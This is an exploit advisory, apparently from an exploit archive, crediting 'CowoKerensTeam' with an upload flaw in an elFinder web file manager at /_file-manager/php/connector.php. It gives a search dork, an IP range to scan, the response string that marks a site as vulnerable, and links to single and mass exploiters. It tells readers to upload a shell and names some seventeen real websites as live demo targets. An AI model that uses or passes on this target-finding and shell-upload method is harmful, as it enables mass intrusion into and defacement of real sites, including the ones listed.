Elfinder Webhost Uploader vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Elfinder Webhost Uploader vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[>] Exploit Title: Elfinder Webhost Uploader vulnerability |[>] |[>] Exploit Author : CowoKerensTeam |[>] |[>] Dork : site:id.ai or IPgrabbing - Reverse IP |[>] |[>] Tested on: Windows 10 |[>] |[>] Date: 25/11/2016 |[>] |--------------------------------------------------------------| |[>] Exploit : /_file-manager/php/connector.php |--------------------------------------------------------------| |[>] |[>] Web based Single Exploiter : http://pastebin.com/EMviZw43 |[>] Web based Mass Exploiter : http://pastebin.com/wcpevk2w |[>] Or Exploiter Online http://own.netau.net/ ||--------------------------------------------------------------| |[>] |[>] IP Grab : 31.170.166.136 - 31.170.166.156 |[>] [136 or 156] can be changed according to the needs 1 to 300 |[>] ||--------------------------------------------------------------| |[>] |[>] www.target.com/_file-manager/php/connector.php |[>] |[>] Vuln : {"error":["errUnknownCmd"]} |[>] ||--------------------------------------------------------------| |[>] |[>] |[>] file uploader in : www.target.com/k.php |[>] |[>] Upload Ur Shell or Script Html |[>] ||--------------------------------------------------------------| |[>] |[>] |[>] DEMO : |[>] http://alfarotvcanal2.com/_file-manager/php/connector.php |[>] http://por3man.ir/_file-manager/php/connector.php |[>] http://kodrian-cs.tk/_file-manager/php/connector.php |[>] http://www.bookallam.tk/_file-manager/php/connector.php |[>] http://egypt.ga/_file-manager/php/connector.php |[>] http://mirprogramm.ru/_file-manager/php/connector.php |[>] http://www.fxradio.tk/_file-manager/php/connector.php |[>] http://ezravantour.nl/_file-manager/php/connector.php |[>] http://adyanit.com/_file-manager/php/connector.php |[>] http://proxyfree.ml/_file-manager/php/connector.php |[>] http://pakcastle.com/_file-manager/php/connector.php |[>] http://karantejwani.tk/_file-manager/php/connector.php |[>] http://jasonmascarenhas.com/_file-manager/php/connector.php |[>] http://www.mad-pt.com/_file-manager/php/connector.php |[>] http://karamadhost.ir/_file-manager/php/connector.php |[>] http://millarayradio.cl/_file-manager/php/connector.php |[>] http://www.comfortwater.be/_file-manager/php/connector.php |[>] ||--------------------------------------------------------------| |[#] |[#] CowoKerensTeam |[#] Facebook.com/CowoKerensTeam |[#] |[#] |[#] Greetz ~ Trenggalek 6etar |[#] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>